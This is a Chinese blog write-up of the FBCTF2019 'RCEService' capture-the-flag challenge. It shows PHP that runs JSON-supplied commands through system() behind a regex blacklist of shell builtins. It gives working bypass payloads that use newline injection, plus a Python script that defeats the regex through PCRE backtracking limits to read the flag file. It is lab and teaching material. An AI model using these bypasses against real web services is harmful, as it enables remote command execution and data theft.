[FBCTF2019]RCEService1

开始代码审计~

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
    $json = $_REQUEST['cmd'];

    if (!is_string($json)) {
        echo 'Hacking attempt detected<br/><br/>';
    } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
        echo 'Hacking attempt detected<br/><br/>';
    } else {
        echo 'Attempting to run command:<br/>';
        $cmd = json_decode($json, true)['cmd'];
        if ($cmd !== NULL) {
            system($cmd);
        } else {
            echo 'Invalid input';
        }
        echo '<br/><br/>';
    }
}

?>

1. putenv('PATH=/home/rceservice/jail');  配置了一个环境变量,所以我们输入系统命令的时候需要找到它的绝对路径比如/bin/cat .

2. is_string() 说明我们传入的value,必须是字符型.

3. preg_math(),我们需要绕过这个正则表达式,不过它真的好长.

4. json_decode(),说明我们传入的格式为json格式.

5. system(),我们可以通过传入系统命令来找出flag值.

 我们开始进行绕过preg_math()~

 我们可以通过两种姿势来绕过~

 1. %0a 绕过

知识点:

       1 " . "不会匹配换行符(%0a,\n),除非正则表达式后面添加了m(多行模式)选项,或者s选项,可以使 . 可以在单行模式下匹配换行符,如下.

<?php  
$json = "flag"; 
if (preg_match('/^.*(flag).*$/', $json)) { 
    echo 'Hacking attempt detected';  
}  
?>

只需要 $json="\nflag" 

        2 当%0a在末尾时,$似乎会忽略%0a,如下.

if(preg_math('/^flag$/',$_GET['a'])&&$_GET['a']!=='flag'){
    echo $flag;
}

只需传入 ?a=flag%a

开始构造payload~

?cmd={"cmd":"/bin/cat /home/rceservice/flag"%0a}%0a%0a
?cmd=%0a{"cmd":"/bin/cat /home/rceservice/flag"%0a}

2. PCRE回溯绕过

知识点:

PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌 (leavesongs.com)

import requests

url='http://ffa3fe84-58c7-4980-bf07-b573c0c5dcdb.node5.buuoj.cn:81/'
data={
    'cmd':'{"cmd":"/bin/cat /home/rceservice/flag","feng":"'+'a'*1000000+'"}'
}
r=requests.post(url=url,data=data).text
print(r)

        

        

  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值